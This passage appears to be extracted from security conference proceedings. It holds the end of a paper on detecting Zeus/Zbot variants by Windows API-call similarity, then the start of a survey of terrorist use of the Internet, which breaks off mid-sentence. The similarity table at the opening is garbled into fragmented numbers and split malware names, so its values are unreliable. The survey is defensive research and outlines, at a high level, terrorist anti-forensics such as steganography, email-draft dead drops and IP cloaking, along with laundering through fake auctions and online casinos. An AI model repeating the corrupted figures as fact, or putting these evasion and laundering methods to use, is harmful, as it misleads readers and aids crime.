1 36.19 27.44<br />

71.3<br />

3 41.23 49.47<br />

64.1<br />

8 85.66 48.82<br />

Troj<br />

an.Z<br />

bot-<br />

115<br />

1.m<br />

al<br />

81.3<br />

8<br />

74.6<br />

0<br />

62.0<br />

7<br />

79.1<br />

0<br />

42.6<br />

4<br />

79.6<br />

6<br />

100.<br />

00<br />

60.1<br />

0<br />

74.2<br />

4<br />

76.9<br />

8<br />

81.0<br />

5<br />

67.2<br />

1<br />

74.7<br />

2<br />

74.2<br />

0<br />

81.7<br />

3<br />

78.1<br />

5<br />

74.1<br />

7<br />

62.2<br />

9<br />

82.6<br />

5<br />

57.2<br />

8<br />

DHL<br />

_DO<br />

C.m<br />

al<br />

94.4<br />

6<br />

82.9<br />

1<br />

73.7<br />

4<br />

66.5<br />

3<br />

68.1<br />

3<br />

86.2<br />

4<br />

59.7<br />

3<br />

100.<br />

00<br />

90.7<br />

7<br />

88.7<br />

8<br />

79.3<br />

2<br />

88.5<br />

8<br />

79.6<br />

6<br />

71.8<br />

5<br />

91.7<br />

5<br />

80.0<br />

6<br />

72.9<br />

7<br />

53.7<br />

2<br />

71.6<br />

6<br />

73.7<br />

6<br />

Troj<br />

an.<br />

Spy.<br />

Zeu<br />

s.1.<br />

Gen<br />

.mal<br />

68.9<br />

1<br />

57.0<br />

6<br />

71.5<br />

6<br />

61.7<br />

5<br />

51.3<br />

0<br />

71.8<br />

5<br />

68.9<br />

8<br />

47.2<br />

8<br />

100.<br />

00<br />

86.4<br />

1<br />

77.8<br />

9<br />

83.5<br />

2<br />

85.1<br />

6<br />

72.7<br />

1<br />

59.1<br />

7<br />

79.5<br />

9<br />

68.1<br />

6<br />

41.1<br />

5<br />

57.5<br />

6<br />

70.8<br />

3


Trojan.Sp<br />

y.Zeus.1.<br />

Gen.mal<br />

Trojan.Zb<br />

ot-<br />

1307.mal<br />

Trojan.Zb<br />

ot-<br />

2163.mal<br />

Tro<br />

jan.<br />

Sp<br />

y.Z<br />

eus<br />

.1.<br />

Ge<br />

n.<br />

mal<br />

54.<br />

23<br />

57.<br />

10<br />

63.<br />

53<br />

Troj<br />

an.Z<br />

bot-<br />

85.<br />

mal<br />

Madhu Shankarapani and Srinivas Mukkamala<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.2.Ge<br />

n.mal<br />

63.8<br />

2 78.15<br />

58.4<br />

6 63.92<br />

56.5<br />

1 81.88<br />

Troj<br />

an.B<br />

roke<br />

r-<br />

12.<br />

mal<br />

61.3<br />

3<br />

78.4<br />

7<br />

84.0<br />

4<br />

5. Similarity analysis results<br />

Troj<br />

an.<br />

Zbo<br />

t-<br />

134<br />

2.m<br />

al<br />

86.<br />

42<br />

82.<br />

03<br />

74.<br />

65<br />

Troj<br />

an.<br />

Spy<br />

.Ze<br />

us.<br />

1.G<br />

en.<br />

mal<br />

66.<br />

27<br />

60.<br />

21<br />

55.<br />

75<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

59.4<br />

5<br />

59.6<br />

4<br />

68.0<br />

1<br />

Troj<br />

an.S<br />

py.Z<br />

eus.<br />

1.Ge<br />

n.m<br />

al<br />

Troja<br />

n.Zbo<br />

t-<br />

290.<br />

mal<br />

Troja<br />

n.Spy<br />

.Zeus<br />

.1.Ge<br />

n.mal<br />

66.6<br />

9 76.85 58.62<br />

54.5<br />

9 64.83 64.50<br />

60.6<br />

6 50.08 60.47<br />

We apply the traditional similarity functions on Vs’ and Vu’. Cosine measure, extended Jaccard<br />

measure, and the Pearson correlation measure are the popular measures of similarity for sequences.<br />

The cosine measure is given below and captures a scale-invariant understanding of similarity.<br />

Cosine similarity: Cosine similarity is a measure of similarity between two vectors of n dimensions<br />

by finding the angle between them.<br />

Extended Jaccard measure: The extended Jaccard coefficient measures the degree of overlap<br />

between two sets and is computed as the ratio of the number of shared attributes ofVs’ AND Vu’to the<br />

number possessed byVs’ORVu’.<br />

Pearson correlation: Correlation gives the linear relationship between two variables. For a series of<br />

n measurements of variablesVs’andVu’, Pearson correlation is given by the formula below.<br />

Where and are values of variable Vs’ and Vu’ respectively at position i, n is the number of<br />

measurements, and are standard deviations of Vs’ and Vu’ respectively and and are<br />

means of Vs’ and Vu’ respectively.<br />

In these experiments, we calculated the mean value of the three measures. For a particular measure<br />

between a virus signature and a suspicious binary file, S(m)(Vs’i, Vu’), which stands for the similarity<br />

between virus signature i and a suspicious binary file. Our similarity report is generated by calculating<br />

the S(m)(Vs’i, Vu’) value for each virus signature in the signature database.<br />

In this experiment, we compared Zeus/Zbot variants against itself, creating n-by-n matrix which shows<br />

how similar are the variants. Table 1 shows the similarity values of Zeus/Zbot compared among<br />

themselves. From the Table 1 we can infer that variants of Zeus/Zbot are almost similar to sequence<br />

in which the Windows APIs are called.<br />

6. Conclusion<br />

In this paper, we present our effort of approach on malware detection based on Windows API call<br />

sequence. According to our observations, though there is tremendous increase in Zeus/Zbot variant<br />

builders, its behavior of API calls remains almost the same. Thus our approach can detect its variants<br />

258<br />

Troj<br />

an.Z<br />

bot-<br />

115<br />

1.m<br />

al<br />

74.0<br />

3<br />

73.5<br />

8<br />

78.3<br />

0<br />

DHL<br />

_DO<br />

C.m<br />

al<br />

(3)<br />

80.9<br />

5<br />

64.2<br />

9<br />

50.7<br />

3<br />

(1)<br />

(2)<br />

Troj<br />

an.<br />

Spy.<br />

Zeu<br />

s.1.<br />

Gen<br />

.mal<br />

87.5<br />

1<br />

54.3<br />

4<br />

56.1<br />

0


Madhu Shankarapani and Srinivas Mukkamala<br />

very robust and efficiently. Experimental results show that our method is able to show how similar are<br />

these variants, which have evaded the present virus defense systems. From this method it shows how<br />

accurately we can detect Zeus/Zbot variants.<br />

References<br />

Bell, Henry and Chien, Eric. (2010) Trojan.Vundo, Symantec Technical Report [online], 17 Mar, Available:<br />

http://www.symantec.com/security_response/writeup.jsp?docid=2004-112111-3912-99 [12 Sep 2010].<br />

Chen, C. and Shi, Y. Q. (2008) “JPEG image steganalysis utilizing both intrablock and interblock correlations”,<br />

IEEE International Symposium on Circuits and Systems, Seattle, WA, 18-21 May.<br />

Cooke, E., Jahanian, F. and McPherson, D. (2006) “The zombie roundup: Understanding, detecting, and<br />

disrupting botnets”, in Usenix Workshop on Steps to Reducing Unwanted Traffic on the Internet (SRUTI).<br />

Freiling, F., Holz, T. and Wicherski, G. (2005) “Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />

Distributed Denial-of-Service Attacks”, in <strong>European</strong> Symposium on Research in Computer Security<br />

(ESORICS).<br />

Fridrich, J. (2004) "Feature-based steganalysis for JPEG images and its implications for future design of<br />

steganographic schemes", in Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp. 67-81.<br />

Holz, T., Engelberth, M. and Freiling, F. (2008) Learning More About the Underground Economy: A Case-Study<br />

of Keyloggers and Dropzones, ReiheInformatik TR-2008-006, University of Mannheim.<br />

Kanich, C., Levchenko, K., Enright, B., Voelker, G. and Savage, S. (2008) “The Heisenbot Uncertainty Problem:<br />

Challenges in Separating Bots from Chaff”, in USENIX Workshop on Large-Scale Exploits and Emergent<br />

Threats.<br />

Karasaridis, A., Rexroad, B. and Hoeflin, D. (2007) “Wide-scale botnet detection and characterization”, in<br />

USENIX Workshop on Hot Topics in Understanding Botnet.<br />

Lyu, S. and Farid, H. (2002) "Detecting hidden messages using higher order statistics and support vector<br />

machines", in Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />

McMillan, Robert and Kirk, Jeremy. (2010) US charges 60 in connection with Zeus Trojan [online], 30 Sep,<br />

Available: http://www.csoonline.com/article/620830/us-charges-60-in-connection-with-zeus-trojan [1 Oct<br />

2010].<br />

Moscaritolo, Angela. (2009) New Verizon Wireless-themed Zeus campaign hits [online], 16 Nov,<br />

Available:http://www.scmagazineus.com/new-verizon-wireless-themed-zeus-campaign-hits/article/157848<br />

[8 Sep 2010].<br />

Nichols, Shaun. (2009) UCSB researchers hijack Torpig botnet [online], V3.co.uk, 04 May, Available:<br />

http://www.v3.co.uk/vnunet/news/2241609/researchers-hijack-botnet [06 May 2009].<br />

Offensive Computing [online], Available: http://offensivecomputing.net [21 Jul 2010].<br />

Pevny, T., and Fridrich, J. (2007) “Merging Markov and DCT features for multi-class JPEG steganalysis”, in<br />

Proceedings of SPIE Electronic Imaging, Photonics West, pp. 03-04.<br />

Qureshi, Mohammad. MBCS, MIET [online], Available: http://umer.quresh.info/Network%20Attacks.pdf [13-Dec-<br />

2010].<br />

Ragan, Steve. (2009) ZBot data dump discovered with over 74,000 FTP credentials [online], 29 Jun, Available:<br />

http://www.thetechherald.com/article.php/200927/3960/ZBot-data-dump-discovered-with-over-74-000-FTPcredentials<br />

[5 Jul 2009].<br />

Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2006) “A Multifaceted Approach to Understanding the<br />

Botnet Phenomenon”. ACM Internet Measurement <strong>Conference</strong> (IMC).<br />

Rajab, M. A., Zarfoss, J., Monrose, F. and Terzis, A. (2007) “My Botnet is Bigger than Yours (Maybe, Better than<br />

Yours): Why Size Estimates Remain Challenging”, in USENIX Workshop on Hot Topics in Understanding<br />

Botnet.<br />

Ramachandran, A., Feamster, N. and Dagon, D. (2006) “Revealing Botnet Membership Using DNSBL Counter-<br />

Intelligence”, in <strong>Conference</strong> on Steps to Reducing Unwanted Traffic on the Internet.<br />

Sallee, P. (2005) “Model based methods for steganography and steganalysis”, International Journal of Image and<br />

Graphics, Vol. 5, No. 1, 2005, 167-189.<br />

SHEVCHENKO, SERGEI. (2009) Time to Revisit Zeus Almighty [online], 16 Sep, Available:<br />

http://blog.threatexpert.com/2009_09_01_archive.html [19 Sep 2009].<br />

Shi, Y. Q., Chen, C. and Chen, W. (2006) "A Markov process based approach to effective attacking JPEG<br />

steganography", in Proceedings of the 8th international conference on Information hiding.<br />

Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) "YASS: Yet another steganographic scheme that resists blind<br />

steganalysis", in Proceedings of 9th Information Hiding Workshop, ISBN:3-540-77369-X 978-3-540-77369-<br />

6, pp. 16-31, Saint Malo, France.<br />

Stone-Gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., Kruegel, C. and Vigna, G.<br />

(2009) “Your Botnet is My Botnet: Analysis of a Botnet Takeover”, CCS’09, 9–13 Nov, Chicago, Illinois,<br />

USA.<br />

Westfeld, A. (2001) “High capacity despite better steganalysis (F5-a steganographic algorithm)”, Information<br />

Hiding, 4th International Workshop, LNCS 2137, pp. 289-302, Springer-Verlag Berlin Heidelberg.<br />

Zeus (trojan horse). Wikipedia [online], Available: http://en.wikipedia.org/wiki/Zeus_(trojan_horse), [12 Sep 2010].<br />

Zhuang, L., Dunagan, J., Simon, D., Wang, H., Osipkov, I., Hulten, G. and Tygar, J. (2008) “Characterizing<br />

botnets from email spam records”, in USENIX Workshop on Large-Scale Exploits and Emergent Threats.<br />

259


Terrorist use of the Internet: Exploitation and Support<br />

Through ICT Infrastructure<br />

Namosha Veerasamy and Marthie Grobler<br />

Council for Scientific and Industrial Research, Pretoria, South Africa<br />

nveerasamy@csir.co.za<br />

mgrobler1@csir.co.za<br />

Abstract: The growth of technology has provided a wealth of functionality. One area in which Information<br />

Communication Technology (ICT), especially the Internet, has grown to play a supporting role is terrorism. The<br />

Internet provides an enormous amount of information, and enables relatively cheap and instant communication<br />

across the globe. As a result, the conventional view of many traditional terrorist groups shifted to embrace the<br />

use of technology within their functions. The goal of this paper is to represent the functions and methods that<br />

terrorists have come to rely on through the ICT infrastructure. The discussion sheds light on the technical and<br />

practical role that ICT infrastructure plays in the assistance of terrorism. The use of the Internet by terrorist<br />

groups has expanded from traditional Internet usage to more innovative usage of both traditional and new<br />

Internet functions. Global terrorist groups can now electronically target an enormous amount of potential<br />

recipients, recruitees and enemies. The aim of the paper is to show how the Internet can be used to enable<br />

terrorism, as well as provide technical examples of the support functionality and exploitation. This paper<br />

summarises the high-level functions, methods and examples for which terrorists utilise the Internet. This paper<br />

looks at the use of the Internet as both a uni-directional and bi-directional tool to support functionality like<br />

recruitment, propaganda, training, funding and operations. It also discusses specific methods like the<br />

dissemination of web literature, social-networking tools, anti-forensics and fund-raising schemes. Additional<br />

examples, such as cloaking and coding techniques, are also provided. In order to analyse how ICT infrastructure<br />

can be used in the support of terrorism, a mapping is given of communication direction to the traditional Internet<br />

use functions and methods, as well as to innovative Internet functions and methods.<br />

Keywords: anti-forensics, internet, terrorism, ICT, propaganda, social-networking<br />

1. Introduction<br />

According to the Internet World Stats webpage, the latest number of world Internet users (calculated<br />

30 June 2010) are 1 966 541 816 representing a 28.7% penetration of the world population (2010).<br />

Although this does not reflect a majority of the world population, it presents an enormous amount of<br />

potential recipients, recruitees and enemies that global terrorist groups can target electronically.<br />

However, terrorist groups’ embracing of technology used to be an uncommon phenomenon.<br />

In the book, The secret history of al Qaeda, an eye witness to the al Qaeda men fleeing United States<br />

bombardments of their training camps in November 2001 are quoted: "Every second al Qaeda<br />

member [was] carrying a laptop computer along with his Kalashnikov" (Atwan 2006). This scenario is<br />

highly paradoxical where an organisation utterly against the modern world (such as al Qaeda), are<br />

increasingly relying on hi-tech electronic facilities offered by the Internet to operate, expand, develop<br />

and survive. Especially in the early 1980s, some groups in Afghanistan were opposed to using any<br />

kind of technology that is of largely Western origin or innovation (Atwan 2006).<br />

However, the world has changed. Technology has been introduced in most aspects of daily lives and<br />

the Internet has become a prominent component of business and private life. It provides an enormous<br />

amount of information and enables relatively cheap and instant communication across the globe. As a<br />

result, the traditional view of many traditional terrorist groups shifted to embrace the use of technology<br />

within their functions. In 2003, a document titled 'al Qaeda: The 39 principles of Jihad' was published<br />

on the al-Farouq website. Principle 34 states that 'performing electronic jihad' is a 'sacred duty'. The<br />

author of the principle document calls upon the group's members to participate actively in Internet<br />

forums. He explains that the Internet offers the opportunity to respond instantly and to reach millions<br />

of people in seconds. Members who have Internet skills are urged to use them to support the jihad by<br />

hacking into and destroying enemy websites (Atwan 2006).<br />

Keeping this principle in mind, the use of the Internet by terrorist groups has expanded from only<br />

traditional Internet usage to more innovative usage of both traditional and new Internet functions. This<br />

paper will summarise the high-level functions, methods and examples for which terrorists utilise the<br />

Internet. The examples and methods often provide for various functions and thus a strict one-to-one<br />

260


Namosha Veerasamy and Marthie Grobler<br />

mapping cannot be provided. Rather, the examples given shed light on the technical and practical role<br />

that ICT infrastructure plays in the support of terrorism.<br />

2. Functionality of the internet<br />

Terrorists use the Internet because it is easy and inexpensive to disseminate information<br />

instantaneously worldwide (Piper 2008). By its very nature, the Internet is in many ways an ideal<br />

arena for activity by terrorist groups. The Internet offers little or no regulation, is an anonymous<br />

multimedia environment, and has the ability to shape coverage in the traditional mass media<br />

(Weimann 2005).<br />

Whilst the Internet was originally created to facilitate communication between two computers, its<br />

functionality now extends to information repository as well. Figure 1 shows the general functions that<br />

terrorists may use the Internet for, with an indication of which type of methods are used for each<br />

functionality type.<br />

Recruitment – the process of attracting, screening and selecting individuals to become members<br />

of the terrorist groups; both web literature and social networking tools can be applied for this<br />

purpose.<br />

Training – the process of disseminating knowledge, skills and competency to new recruits with<br />

regard to specific topics of knowledge that may be needed during terrorist operations; social<br />

networking tools and anti-forensics methods are employed for this purpose.<br />

Communication – the process of conveying information to members of the terrorist group; social<br />

networking tools and anti-forensics methods are employed for this purpose.<br />

Operations – the direction and control of a specific terrorist attack; web literature, anti-forensics<br />

and fundraising methods are employed for this purpose.<br />

Propaganda – a form of communication aimed at influencing the terrorist community toward a<br />

specific cause; both web literature and social networking tools can be applied for this purpose.<br />

Funding – financial support provided to make a specific terrorist operation possible; fundraising<br />

methods are used for this purpose.<br />

Psychological warfare – the process of spreading disinformation in an attempt to deliver threats<br />

intended to distil fear and helplessness within the enemy ranks; both web literature and social<br />

networking tools can be applied for this purpose.<br />

The Internet is the perfect tool to exploit in order to support terrorist activities. Not only does it provide<br />

location independence, speed, anonymity and internationality, but is also provides a relatively low<br />

cost-benefit ratio (Brunst 2010), making it a desirable tool. Figure 1 shows the complexity of terrorist<br />

groups' use of the Internet (as both traditional communication and information gathering tool) in<br />

innovative new ways. The Internet is also used as both uni-directional and bi-directional<br />

communication tool.<br />

Although this list of functionalities is not exhaustive, it provides a better understanding of the need for<br />

specific methods to exploit the ICT infrastructure to support terrorist activities. The next section<br />

discusses the methods in more detail, and explains these with actual examples.<br />

3. Exploiting the ICT infrastructure to support terrorist activities<br />

For the purpose of this article, Internet exploitation methods are divided into four distinct groups: web<br />

literature, social networking tools, anti-forensics and fundraising. Figure 2 shows these groups with<br />

some examples of how the methods may be employed.<br />

3.1 Web literature<br />

Web literature refers to all writings published on the web in a particular style on a particular subject.<br />

Some of the types of web literature facilitated by terrorist groups include published periodicals and<br />

essays, manuals, encyclopaedias, poetry, videos, statements and biographies. Since web literature<br />

often takes on the form of mass uni-directional communication, this media is ideal for terrorist use in<br />

recruitment, operations, training and propaganda.<br />

261


Namosha Veerasamy and Marthie Grobler<br />

Figure 1: The Internet as terrorist supporting mechanism<br />

Figure 2: Examples of how terrorists may use the Internet<br />

262


Namosha Veerasamy and Marthie Grobler<br />

Radio Free Europe/Radio Liberty compiled a special report on the use of media by Sunni Insurgents<br />

in Iraq and their supporters worldwide. This report discusses the products produced by terrorist media<br />

campaigns, including text, audiovisual and websites (Kimmage, Ridolfo 2007). The distribution of text<br />

and audiovisual media is a traditional use of the Internet, with little innovative application. Text media<br />

include press releases, operational statements, inspirational texts and martyr biographies. Audiovisual<br />

media include recordings of al Qaeda operations in Iraq (Atwan 2006). Online training material can<br />

provide detailed instructions on how to make letter bombs; use poison and chemicals; detonate car<br />

bombs; shoot US soldiers; navigate by the stars (Coll, Glasser 2005) and assemble a suicide bomb<br />

vest (Lachow, Richardson 2007).<br />

The use of dedicated websites within terrorist circles is prominent. By the end of 1999, most of the 30<br />

organisations designated as Foreign Terrorist Organisations had a maintained web presence<br />

(Weimann 2009). In 2006, this number has grown to over 5000 active websites (Nordeste, Carment<br />

2006). These websites generally provide current activity reports and vision and mission statements of<br />

the terrorist group. Sympathetic websites focus largely on propaganda. These websites have postings<br />

of entire downloadable books and pamphlet libraries aimed at indoctrinating jihadi sympathizers and<br />

reassuring already indoctrinated jihadists (Jamestown Foundation 2006). Pro-surgent websites focus<br />

on providing detailed tutorials to group members, e.g. showing how to add news crawls that provide<br />

the latest, fraudulent death toll for US forces in Iraq.<br />

According to an al Qaeda training manual, it is possible to gather at least 80% of all information<br />

required about the enemy, by using public Internet sources openly and without resorting to illegal<br />

means (Weimann 2005). More than 1 million pages of historical government documents have been<br />

removed from public view since the 9/11 terror attacks. This record of concern program aims to<br />

"reduce the risk of providing access to materials that might support terrorists". Among the removed<br />

documents is a database from the Federal Emergency Management Agency with information about all<br />

federal facilities, and 200 000 pages of naval facility plans and blueprints. The data is removed from<br />

public domain, but individuals can still request to see parts of the withdrawn documents under the<br />

Freedom of Information Act (Bass, Ho 2007).<br />

Other examples of web literature and information collected through the Internet include maps, satellite<br />

photos of potential attack sites, transportation routes, power and communication grids, infrastructure<br />

details, pipelines systems, dams and water supplies, information on natural resources and email<br />

distribution lists. Although this type of information may not necessarily be useful in cyberterrorism<br />

activities, it can be used to plan traditional terrorism activities without actually going to the<br />

geographical location of the target. Some terrorist groups have recently been distributing flight<br />

simulation software. Web literature can thus be used in the initial recruitment campaigns by glorifying<br />

terrorism through inspirational media, as well as the training of members, propaganda and the<br />

operations of the terrorist group.<br />

3.2 Social networking tools<br />

Social networking tools focus on building and reflecting social networks or social relations among<br />

people who share a common interest. Some types of social networking tools facilitated by terrorist<br />

groups include online forums and blogs, websites, games, virtual personas, music and specialised<br />

applications. Social networking tools offer both uni-directional and bi-directional communications, and<br />

can be used for recruitment, training, propaganda and communication within terrorist groups.<br />

Social networking and gaming sites often require new members to create accounts by specifying their<br />

names, skills and interests. Through the creation of these virtual personas, terrorist groups are able to<br />

gather information on potential recruits. Individuals with strong technical skills in the fields of<br />

chemistry, engineering or weapons development can be identified and encouraged to join the group.<br />

This type of information can be derived from interactions in social networking sites, forums and blogs<br />

where users share information about their interests, beliefs, skills and careers. Online gaming sites<br />

also provide a source of potential members. For example, terrorist groups identify online players with<br />

a strong shooting ability that might be indicative of violent tendencies. In some terrorist groups, this<br />

type of temperament would be ideal for operational missions.<br />

In addition to traditional social networking sites like Facebook and MySpace, Web 2.0 technologies<br />

evolved to customisable social networking sites. West and Latham (2010) state that social networking<br />

creation sites are an online extremist's dream - it is inexpensive, easy-to-use, highly customisable and<br />

263


Namosha Veerasamy and Marthie Grobler<br />

conducive to online extremism. Ning users, for example, can create an individualised site where users<br />

have the ability to upload audio and video files, post and receive messages and blog entries, create<br />

events and receive RSS feeds. If a terrorist group sets up a customised social site, they would have<br />

the ability to control access to members, post propaganda videos and even use the site for<br />

fundraising.<br />

Another way of promoting a cause is with music (Whelpton 2009). Islamic and white supremist groups<br />

perform captivating songs with pop and hip-hop beats that often attract young influential teenagers.<br />

The lyrics of the music promote the cause and the catchy beats keep the youth captivated.<br />

Other examples of social networking include chat rooms, bulletin boards, discussion groups and micro<br />

blogging (such as Twitter). The type of social networking used by terrorist groups depends on the<br />

group’s infrastructure, ability and personal preference. For example, al Qaeda operatives use the<br />

Internet in public places and communicate by using free web based email accounts. For these public<br />

types of communication, instructions are often delivered electronically through code, usually in<br />

difficult-to-decipher dialects for which Western intelligence and security services have few or no<br />

trained linguists (Nordeste, Carment 2006).<br />

3.3 Anti-forensics<br />

Anti-forensics is a set of tools or methods used to counter the use of forensic tools and methods.<br />

Some of the identified types of anti-forensic measures include steganography, dead dropping,<br />

encryption, IP-based cloaking, proxies and anonymising. Since anti-forensic measures mostly offer<br />

targeted uni-directional communication, it is ideal for training, operations and communication within<br />

terrorist groups.<br />

Steganography is a method of covertly hiding messages within another. This is done by embedding<br />

the true message within a seemingly innocuous communication, such as text, image or audio. Only<br />

individuals that know of the hidden message and have the relevant key will be able to extract the<br />

original message from the carrier message. The password or passphrase is delivered to the intended<br />

recipient by secure alternative means (Lau 2003). Although it is difficult to detect the modified carrier<br />

media visually, it is possible to use statistical analysis. The February 2007 edition of Technical<br />

Mujahid contains an article that encourages extremists to download a copy of the encryption program<br />

“Secrets of the Mujahideen” from the Internet (2007). The program hid data in the pixels of the image<br />

and compressed the file to defeat steganalysis attempts.<br />

Another technique that would bypass messaging interception techniques is the use of virtual dead<br />

dropping, or draft message folders. Bruce Hoffman from Rand Corp. (in (Noguchi, Goo 2006)) states<br />

that terrorists create free web based email accounts and allow others to log into the accounts and<br />

read the drafts without the messages ever been sent. The email account name and password is<br />

transmitted in code in a chat forum or secure message board to the intended recipients. This<br />

technique is used especially for highly sensitive information (Nordeste, Carment 2006) and if<br />

electronic interception legislation may come into play.<br />

Redirecting of traffic through IP-based cloaking is another anti-forensic technique. At a seminar in<br />

FOSE 2006, Cottrell (in ((Carr 2007))) stated that: “When the Web server receives a page request, a<br />

script checks the IP address of the user against a list of known government IP addresses. If a match<br />

is found, the server delivers a Web page with fake information. If no match is found, the requesting<br />

user is sent to a Web page with real information”. From this, the expression cloaking as the authentic<br />

site is masked. This also leads to a similar technique called IP-based blocking that prevents users’<br />

access to a site instead of redirecting the traffic.<br />

Other techniques include the use of a proxy and secure channel to hide Internet activity. The Search<br />

for International Terrorist Entities Institute (SITE) detected a posting that encouraged the use of a<br />

proxy as it erases digital footsteps such as web addresses and other identifiable information (Noguchi,<br />

Goo 2006). The premise of this approach is that the user connects to a proxy that requests an<br />

anonymising site to redirect the user to the target site. The connection to the proxy is via a secure<br />

encrypted channel that hides the originating user’s details. The well-known cyber user Irhabi 007<br />

(Terrorist 007) also provided security tips by distributing anonymising software that masks an IP<br />

address (Labi 2006).<br />

264


Namosha Veerasamy and Marthie Grobler<br />

Another innovative use of the Internet is provided by spammimic.com. Spam (unsolicited distribution<br />

of mass email communication) has become a nuisance for the average netizen. Most people<br />

automatically delete these messages or send it to the spam folder. Spammimic.com provides an<br />

interesting analogue of encryption software that hides messages within the text of ordinary mail. It<br />

does not provide true encryption, but hides the text of a short message into what appears to be an<br />

average spam mail. Not only will the messages be disguised, but few people will take the chance to<br />

open the email in fear of attached malware. Thus, only the intended recipients will know about the<br />

disguised messages and decode it through the web interface (Tibbetts 2002).<br />

3.4 Fundraising<br />

Fundraising is the process of soliciting and gathering contributions by requesting donations, often in<br />

the form of money. Some of the identified types of fundraising methods include donations,<br />

auctioneering, casinos, credit card theft, drug trafficking and phishing. Since fundraising methods<br />

mostly offer targeted communication, it can be used for operations and funding activities.<br />

Since the 9/11 terrorist attack, terrorist groups have increasingly relied on the Internet for finance<br />

related activities. Popular terrorist organisation websites often have links such as “What You Can Do”<br />

or “How Can I Help”. Terrorist websites publish requests for funds by appealing to sympathetic users<br />

to make donations and contribute to the funding of activities. Visitors to such websites are monitored<br />

and researched. Repeat visitors or individuals spending extended periods on the websites are<br />

contacted (Piper 2008). These individuals are guided to secret chat rooms or instructed to download<br />

specific software that enables users to communicate on the Internet without being monitored<br />

(Nordeste, Carment 2006).<br />

However, malicious or disguised methods of fundraising are also possible. Electronic money transfer,<br />

laundering and generating support through front organisations are all fundraising methods used by<br />

terrorists (Goodman, Kirk & Kirk 2007). According to the Financial Action Task Force, “the misuse of<br />

nonprofit organizations for the financing of terrorism is coming to be recognized as a crucial weak<br />

point in the global struggle to stop such funding at its source” (Jacobson 2009). Examples of such<br />

undertakings include Mercy International, Rabita Trust, Global Relief Fund, and Help the Needy<br />

(Conway 2006). Some charities are founded with the express purpose of financing terror, while others<br />

are existing entities that are infiltrated by terrorist supporters from within (Jacobson 2009).<br />

Other methods related to fundraising include online auctioneering to move money around. This<br />

involves two partners, known as smurfs, to arrange a fake transaction. One partner bids on an item<br />

and pays the auction amount to the auction house. The other partner receives payment for the fake<br />

auction item. There are also scams where users bid on their own items in an effort to store money and<br />

prevent detection (Whelpton 2009). In one specific auction, a set of second-hand video games were<br />

offered for $200, whilst the same set could be purchased brand new from the publisher for $39.99<br />

(Tibbetts 2002). Although the ludicrously high selling price is not illegal, this item will only attract<br />

selected attention from a trusted agent. This allows terrorist groups to move money around without<br />

actually delivering the auctioned goods or services.<br />

Online casinos can be used for both laundering and storing money. When dealing with large sums of<br />

money, terrorists can place it in an online gambling site. Small bids are made to ensure activity, while<br />

the rest of the money is safely stored and hidden (Whelpton 2009). Alternatively, any winnings can be<br />

cashed in and transferred electronically to bank accounts specifically created for this purpose<br />

(Jacobson 2009).<br />

Stolen credit cards can help to fund many terrorist activities. For example, Irhabi 007 and his<br />

accomplice accumulated 37 000 stolen credit card numbers, making more than $3.5 million in charges<br />

(Jacobson 2009). In 2005, stolen credit card details were used to purchase domain space with a<br />

request stemming from Paris. When a similar request for nearby domain space was requested, shortly<br />

after the initial request, through another name in Britain, it was detected as fraud and the backup files<br />

of the initial site was investigated. Although the files were mostly Arabic, video footage includes<br />

insurgent forces clashing with American forces, depicting Iraqi conflict from the attacker’s point of view<br />

(Labi 2006).<br />

Drug trafficking is considered a large income source for terrorist groups. Fake Internet drugs are<br />

trafficked, containing harmful ingredients such as arsenic, boric acid, leaded road paint, polish, talcum<br />

265


Namosha Veerasamy and Marthie Grobler<br />

powder, chalk and brick dust. In an elaborate scheme, Americans were tricked in believing they are<br />

buying Viagra, but instead they received fake drugs. The money paid for these drugs is used to fund<br />

Middle Eastern terrorism. The UK Medicine and Healthcare Regulatory Agency reports that up to 62%<br />

of the prescription medicine on sale on the Internet, without requiring a prescription, are fake<br />

(Whelpton 2009).<br />

3.5 Other examples of the exploitation of the ICT infrastructure<br />

Kovner (in (Lachow, Richardson 2007)) discusses one of al Qaeda’s goals of using the Internet to<br />

create resistance blockades to prevent Western ideas from corrupting Islamic institutions. In some<br />

instances, Internet browsers designed to filter out content from undesirable Western sources were<br />

distributed without users being aware of it. Brachman also discusses jihadi computer programmers<br />

launching browsing software, similar to Internet Explorer that searches only particular sites and thus<br />

restricts the freedom to navigate to certain online destinations (2006).<br />

Another technique from the infamous terrorist Irhabi 007 was to exploit vulnerabilities in FTP servers,<br />

reducing risk from exposure and saving money. Irabhi dumped files (with videos of Bin Laden and<br />

9/11 hijackers) onto an FTP server at the Arkansan State Highway and Transport Department and<br />

then posted links warning users of the limited window of opportunity to download (Labi 2006).<br />

SITE (in (Brachman 2006)) discovered a guide for jihadis to use the Internet safely and anonymously.<br />

This guide explains how governments identify users, penetrate their usage of software chat programs<br />

(including Microsoft Messenger and Paltalk), and advise readers not to use Saudi Arabian based<br />

email addresses (ending with .sa) due to its insecure nature. Readers are advised to rather register<br />

from anonymous accounts from commercial providers like Hotmail or Yahoo!.<br />

Cottrell in 2006 (in (Dizard 2006)) discusses the following emerging cloaking trends:<br />

Terrorist organisations host bogus websites that mask their covert information or provide<br />

misleading information to users they identify as federal employees or agents;<br />

Criminal and terrorist organisations are increasingly blocking all traffic from North America or from<br />

IP addresses that point back to users who rely on the English language;<br />

Another cloaking practice is the provision of fake passwords at covert meetings. When one of the<br />

fake passwords are detected, the user is flagged as a potential federal intelligence agent who has<br />

attended the meetings, which in turn makes them vulnerable to being kidnapped or becoming the<br />

unwitting carriers of false information; and<br />

Another method was used in a case in which hackers set a number of criteria that they all shared<br />

using the Linux operating system and the Netscape browser, among other factors. When federal<br />

investigators using computers running Windows and using Internet Explorer visited the hackers'<br />

shared site, the hackers' system immediately mounted a distributed denial-of-service attack<br />

against the federal system.<br />

Sometimes communication between terrorists occurs through a special code developed by the group<br />

itself. By using inconspicuous word and phrases, it is possible to deliver these messages in a public<br />

forum without attracting untoward attention. For example, Mohammed Atta’s final message to the<br />

